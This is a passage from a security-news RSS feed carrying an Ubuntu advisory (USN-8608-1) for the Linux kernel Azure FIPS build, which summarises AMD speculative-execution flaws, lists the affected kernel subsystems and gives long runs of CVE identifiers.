CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31607, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31615, CVE-2026-31616, CVE-2026-31617,
CVE-2026-31618, CVE-2026-31619, CVE-2026-31622, CVE-2026-31623,
CVE-2026-31624, CVE-2026-31625, CVE-2026-31626, CVE-2026-31627,
CVE-2026-31628, CVE-2026-31629, CVE-2026-31634, CVE-2026-31637,
CVE-2026-31638, CVE-2026-31639, CVE-2026-31642, CVE-2026-31645,
CVE-2026-31646, CVE-2026-31648, CVE-2026-31649, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31657, CVE-2026-31658,
CVE-2026-31659, CVE-2026-31660, CVE-2026-31661, CVE-2026-31662,
CVE-2026-31664, CVE-2026-31665, CVE-2026-31667, CVE-2026-31668,
CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31682, CVE-2026-31683, CVE-2026-31684, CVE-2026-31685,
CVE-2026-31686, CVE-2026-31687, CVE-2026-31689, CVE-2026-31693,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43011,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43040, CVE-2026-43041, CVE-2026-43043,
CVE-2026-43044, CVE-2026-43046, CVE-2026-43047, CVE-2026-43049,
CVE-2026-43050, CVE-2026-43051, CVE-2026-43052, CVE-2026-43054,
CVE-2026-43056, CVE-2026-43057, CVE-2026-43058, CVE-2026-43059,
CVE-2026-43060, CVE-2026-43061, CVE-2026-43062, CVE-2026-43064,
CVE-2026-43065, CVE-2026-43066, CVE-2026-43068, CVE-2026-43069,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43085, CVE-2026-43086,
CVE-2026-43088, CVE-2026-43089, CVE-2026-43091, CVE-2026-43092,
CVE-2026-43093, CVE-2026-43094, CVE-2026-43098, CVE-2026-43099,
CVE-2026-43103, CVE-2026-43104, CVE-2026-43105, CVE-2026-43107,
CVE-2026-43109, CVE-2026-43110, CVE-2026-43111, CVE-2026-43112,
CVE-2026-43113, CVE-2026-43114, CVE-2026-43117, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43123, CVE-2026-43124, CVE-2026-43128,
CVE-2026-43129, CVE-2026-43130, CVE-2026-43132, CVE-2026-43133,
CVE-2026-43134, CVE-2026-43135, CVE-2026-43136, CVE-2026-43137,
CVE-2026-43139, CVE-2026-43140, CVE-2026-43141, CVE-2026-43143,
CVE-2026-43145, CVE-2026-43147, CVE-2026-43148, CVE-2026-43149,
CVE-2026-43150, CVE-2026-43152, CVE-2026-43153, CVE-2026-43156,
CVE-2026-43157, CVE-2026-43158, CVE-2026-43159, CVE-2026-43162,
CVE-2026-43163, CVE-2026-43167, CVE-2026-43168, CVE-2026-43169,
CVE-2026-43170, CVE-2026-43171, CVE-2026-43173, CVE-2026-43175,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43185, CVE-2026-43186, CVE-2026-43187, CVE-2026-43189,
CVE-2026-43190, CVE-2026-43194, CVE-2026-43196, CVE-2026-43199,
CVE-2026-43200, CVE-2026-43201, CVE-2026-43202, CVE-2026-43203,
CVE-2026-43205, CVE-2026-43206, CVE-2026-43207, CVE-2026-43209,
CVE-2026-43211, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43261,
CVE-2026-43262, CVE-2026-43264, CVE-2026-43265, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43271,
CVE-2026-43273, CVE-2026-43275, CVE-2026-43277, CVE-2026-43278,
CVE-2026-43279, CVE-2026-43281, CVE-2026-43283, CVE-2026-43287,
CVE-2026-43288, CVE-2026-43289, CVE-2026-43291, CVE-2026-43295,
CVE-2026-43296, CVE-2026-43297, CVE-2026-43300, CVE-2026-43302,
CVE-2026-43304, CVE-2026-43312, CVE-2026-43313, CVE-2026-43314,
CVE-2026-43315, CVE-2026-43316, CVE-2026-43317, CVE-2026-43318,
CVE-2026-43319, CVE-2026-43320, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43341, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43372, CVE-2026-43373, CVE-2026-43377,
CVE-2026-43378, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43383, CVE-2026-43384, CVE-2026-43386, CVE-2026-43387,
CVE-2026-43395, CVE-2026-43397, CVE-2026-43405, CVE-2026-43406,
CVE-2026-43407, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43414, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43493,
CVE-2026-43495, CVE-2026-43496, CVE-2026-43497, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45849, CVE-2026-45851, CVE-2026-45852, CVE-2026-45855,
CVE-2026-45856, CVE-2026-45857, CVE-2026-45858, CVE-2026-45859,
CVE-2026-45860, CVE-2026-45861, CVE-2026-45862, CVE-2026-45864,
CVE-2026-45865, CVE-2026-45866, CVE-2026-45867, CVE-2026-45868,
CVE-2026-45869, CVE-2026-45870, CVE-2026-45871, CVE-2026-45872,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45877, CVE-2026-45878,
CVE-2026-45879, CVE-2026-45880, CVE-2026-45881, CVE-2026-45882,
CVE-2026-45883, CVE-2026-45884, CVE-2026-45885, CVE-2026-45886,
CVE-2026-45890, CVE-2026-45891, CVE-2026-45893, CVE-2026-45895,
CVE-2026-45899, CVE-2026-45902, CVE-2026-45904, CVE-2026-45905,
CVE-2026-45910, CVE-2026-45911, CVE-2026-45912, CVE-2026-45913,
CVE-2026-45914, CVE-2026-45915, CVE-2026-45916, CVE-2026-45917,
CVE-2026-45919, CVE-2026-45920, CVE-2026-45921, CVE-2026-45923,
CVE-2026-45924, CVE-2026-45928, CVE-2026-45935, CVE-2026-45936,
CVE-2026-45938, CVE-2026-45941, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45946, CVE-2026-45947, CVE-2026-45948, CVE-2026-45954,
CVE-2026-45956, CVE-2026-45957, CVE-2026-45958, CVE-2026-45960,
CVE-2026-45962, CVE-2026-45964, CVE-2026-45965, CVE-2026-45968,
CVE-2026-45969, CVE-2026-45970, CVE-2026-45972, CVE-2026-45973,
CVE-2026-45974, CVE-2026-45976, CVE-2026-45978, CVE-2026-45981,
CVE-2026-45982, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45988, CVE-2026-45989,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46002, CVE-2026-46003, CVE-2026-46004,
CVE-2026-46005, CVE-2026-46006, CVE-2026-46007, CVE-2026-46009,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46015, CVE-2026-46016,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46021, CVE-2026-46022,
CVE-2026-46023, CVE-2026-46024, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46031, CVE-2026-46033, CVE-2026-46037, CVE-2026-46038,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46119,
CVE-2026-46120, CVE-2026-46121, CVE-2026-46122, CVE-2026-46123,
CVE-2026-46124, CVE-2026-46125, CVE-2026-46126, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46129, CVE-2026-46131, CVE-2026-46132,
CVE-2026-46133, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46157,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46163,
CVE-2026-46164, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46172, CVE-2026-46173, CVE-2026-46174, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46184, CVE-2026-46185, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46243, CVE-2026-46244, CVE-2026-46246,
CVE-2026-46247, CVE-2026-46249, CVE-2026-46250, CVE-2026-46251,
CVE-2026-46253, CVE-2026-46254, CVE-2026-46255, CVE-2026-46259,
CVE-2026-46260, CVE-2026-46261, CVE-2026-46265, CVE-2026-46266,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46280, CVE-2026-46282, CVE-2026-46285, CVE-2026-46286,
CVE-2026-46287, CVE-2026-46289, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46296, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46303, CVE-2026-46304, CVE-2026-46306,
CVE-2026-46307, CVE-2026-46312, CVE-2026-46314, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8608-1: Linux kernel (Azure FIPS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691496/unix-server/usn-8608-1-linux-kernel-azure-fips-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691496/unix-server/usn-8608-1-linux-kernel-azure-fips-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:38 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
